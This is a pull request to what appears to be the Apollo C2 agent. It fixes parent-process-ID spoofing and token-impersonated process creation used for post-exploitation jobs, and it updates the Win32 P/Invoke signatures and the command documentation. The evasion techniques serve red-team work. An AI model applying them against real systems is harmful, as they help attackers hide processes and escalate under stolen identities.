### PR TITLE
Token Impersonation and PPID Spoofing

### DIFF
--- a/Payload_Type/apollo/agent_code/Apollo/CommandModules/Ppid.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/CommandModules/Ppid.cs
@@ -44,7 +44,7 @@ namespace Apollo.CommandModules
                 job.SetComplete($"Set parent process ID of post-ex jobs to {pid}");
             } else
             {
-                job.SetError($"Failed to set parent process ID to {pid}. Ensure process with ID {pid} is running.");
+                job.SetError($"Failed to set parent process ID to {pid}. Ensure process with ID {pid} is running and in the same desktop session as Apollo.");
             }
         }
     }

--- a/Payload_Type/apollo/agent_code/Apollo/CommandModules/Process.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/CommandModules/Process.cs
@@ -138,7 +138,7 @@ namespace Apollo.CommandModules
             {
                 if (sacrificialProcess.ExitCode == 0 && sacrificialProcess.PID != 0)
                 {
-                    job.SetComplete(String.Format("\nProcess executed '{0}' with PID {1} and returned exit code {2}", cmdString, sacrificialProcess.PID, sacrificialProcess.ExitCode));
+                    job.SetComplete("");
                 } else
                 {
                     job.SetError($"Unknown error. Exit code: {sacrificialProcess.ExitCode} from PID: {sacrificialProcess.PID}");

--- a/Payload_Type/apollo/agent_code/Apollo/Evasion/EvasionManager.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Evasion/EvasionManager.cs
@@ -90,9 +90,15 @@ namespace Apollo.Evasion
             bool bRet = false;
             try
             {
-                System.Diagnostics.Process.GetProcessById(processId);
-                bRet = true;
-                _parentProcessId = processId;
+                var curProc = System.Diagnostics.Process.GetCurrentProcess();
+                var proc = System.Diagnostics.Process.GetProcessById(processId);
+                if (proc.SessionId != curProc.SessionId)
+                    bRet = false;
+                else
+                {
+                    bRet = true;
+                    _parentProcessId = processId;
+                }
             } catch { }
             return bRet;
         }

--- a/Payload_Type/apollo/agent_code/Apollo/Native/Methods.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Native/Methods.cs
@@ -218,11 +218,23 @@ namespace Native
 
         [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
         internal static extern bool CreateProcessWithTokenW(
-            IntPtr hToken,
-            IntPtr dwLogonFlags,
+            SafeFileHandle hToken,
+            LogonFlags dwLogonFlags,
             string lpApplicationName,
             string lpCommandLine,
-            ProcessCreationFlags dwCreationFlags,
+            CreateProcessFlags dwCreationFlags,
+            IntPtr lpEnvironment,
+            string lpCurrentDirectory,
+            [In] ref StartupInfo lpStartupInfo,
+            out ProcessInformation lpProcessInformation);
+
+        [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
+        internal static extern bool CreateProcessWithTokenW(
+            IntPtr hToken,
+            LogonFlags dwLogonFlags,
+            string lpApplicationName,
+            string lpCommandLine,
+            CreateProcessFlags dwCreationFlags,
             IntPtr lpEnvironment,
             string lpCurrentDirectory,
             [In] ref STARTUPINFO lpStartupInfo,
@@ -264,34 +276,17 @@ namespace Native
             [In] ref StartupInfoEx lpStartupInfo,
             out ProcessInformation lpProcessInformation);
 
-
-        [DllImport("advapi32.dll", SetLastError = true)]
-        internal static extern bool CreateProcessAsUserA(
-            IntPtr hToken,
+        [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
+        internal static extern bool CreateProcessWithTokenW(
+            SafeFileHandle hToken,
+            LogonFlags dwLogonFlags,
             string lpApplicationName,
-            StringBuilder lpCommandLine,
-            SECURITY_ATTRIBUTES lpProcessAttributes,
-            SECURITY_ATTRIBUTES lpThreadAttributes,
-            bool bInheritHandles,
-            ProcessCreationFlags dwCreationFlags,
+            string lpCommandLine,
+            CreateProcessFlags dwCreationFlags,
             IntPtr lpEnvironment,
             string lpCurrentDirectory,
-            STARTUPINFO lpStartupInfo,
-            out PROCESS_INFORMATION lpProcessInformation);
-
-        [DllImport("advapi32.dll", SetLastError = true)]
-        internal static extern bool CreateProcessAsUserA(
-            IntPtr hToken,
-            string lpApplicationName,
-            StringBuilder lpCommandLine,
-            SECURITY_ATTRIBUTES lpProcessAttributes,
-            SECURITY_ATTRIBUTES lpThreadAttributes,
-            bool bInheritHandles,
-            ProcessCreationFlags dwCreationFlags,
-            IntPtr lpEnvironment,
-            string lpCurrentDirectory,
-            StartupInfoEx lpStartupInfo,
-            out PROCESS_INFORMATION lpProcessInformation);
+            [In] ref StartupInfoEx lpStartupInfo,
+            out ProcessInformation lpProcessInformation);
 
 
         [DllImport("kernel32.dll")]
@@ -497,7 +492,7 @@ namespace Native
 );*/
 
 
-        [DllImport("kernel32.dll")]
+        [DllImport("kernel32.dll", SetLastError = true)]
         public static extern bool DuplicateHandle(
             IntPtr hSourceProcessHandle,
             IntPtr hSourceHandle,
@@ -508,13 +503,24 @@ namespace Native
             DuplicateOptions dwOptions
             );
 
-        [DllImport("kernel32.dll")]
+        [DllImport("kernel32.dll", SetLastError = true)]
         public static extern bool DuplicateHandle(
             IntPtr hSourceProcessHandle,
             SafeFileHandle hSourceHandle,
-            IntPtr hTargetProcessHandle,
+            SafeFileHandle hTargetProcessHandle,
             ref SafeFileHandle lpTargetHandle,
             uint dwDesiredAccess,
+            bool bInheritHandle,
+            DuplicateOptions dwOptions
+            );
+
+        [DllImport("kernel32.dll", SetLastError = true)]
+        public static extern bool DuplicateHandle(
+            IntPtr hSourceProcessHandle,
+            SafeFileHandle hSourceHandle,
+            SafeFileHandle hTargetProcessHandle,
+            ref SafeFileHandle lpTargetHandle,
+            System.Enum dwDesiredAccess,
             bool bInheritHandle,
             DuplicateOptions dwOptions
             );
@@ -992,8 +998,11 @@ namespace Native
 
         #region USERENV
 
-        [DllImport("userenv.dll", SetLastError = true)]
+        [DllImport("userenv.dll", SetLastError = true, CharSet = CharSet.Unicode)]
         public static extern bool CreateEnvironmentBlock(out IntPtr lpEnvironment, IntPtr hToken, bool bInherit);
+
+        [DllImport("userenv.dll", SetLastError = true)]
+        public static extern bool DestroyEnvironmentBlock(IntPtr lpEnvironment);
 
         #endregion
     }

--- a/Payload_Type/apollo/agent_code/Apollo/Native/Structures.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Native/Structures.cs
@@ -24,7 +24,7 @@ namespace Native
             public IntPtr dacl;
         }
 
-        [StructLayout(LayoutKind.Sequential)]
+        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
         public struct StartupInfo
         {
             public Int32 cb;

--- a/documentation-payload/apollo/commands/ppid.md
+++ b/documentation-payload/apollo/commands/ppid.md
@@ -15,3 +15,5 @@ ppid [pid]
 
 ## Detailed Summary
 The `ppid` command will set the parent process to the specified process identifier for all post-exploitation jobs. This is one of two attributes you can set for fork-and-run jobs, which all start up using the StartupInfoEx structure.
+
+If the process ID specified is not the same as Apollo's session, this function call will fail. Moreover, there are some SEH exceptions I can't track down and they all stem from using impersonated tokens and attempting to spoof logons. Due to that fact, if you are using an impersonated security context in any capacity, Apollo will default back to the current executing process for its parent. I have attempted to put as many guard rails as possible on this, but I'm certain I've missed some edge cases. Careful!


### PR DESCRIPTION
This hotpatch is meant as a quick-fix to some bugs I introduced with the latest PPID/Block DLLs release. Unfortunately, there were some unforeseen consequences about using the StartupInfoEx structure and thevarious CreateProcess calls. Those nuances had to be painstakingly teased out, and in the process I had to discover the boundaries of ppid spoofing. This PR introduces significant guard rails in order to provide some stability.